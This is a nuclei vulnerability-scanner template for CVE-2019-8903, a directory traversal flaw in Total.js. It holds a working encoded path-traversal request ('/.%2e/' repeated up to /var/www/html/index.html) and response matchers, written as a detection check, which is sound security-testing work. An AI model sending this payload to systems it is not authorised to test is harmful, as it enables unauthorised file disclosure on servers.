nuclei-templates/cves/2019/CVE-2019-8903.yaml

27 lines
856 B
YAML

id: CVE-2019-8903
info:
name: Totaljs - Unauthenticated Directory Traversal
author: madrobot
severity: high
description: index.js in Total.js Platform before 3.2.3 allows path traversal.
reference: |
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
tags: cve,cve2019,totaljs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "apache2.conf"
part: body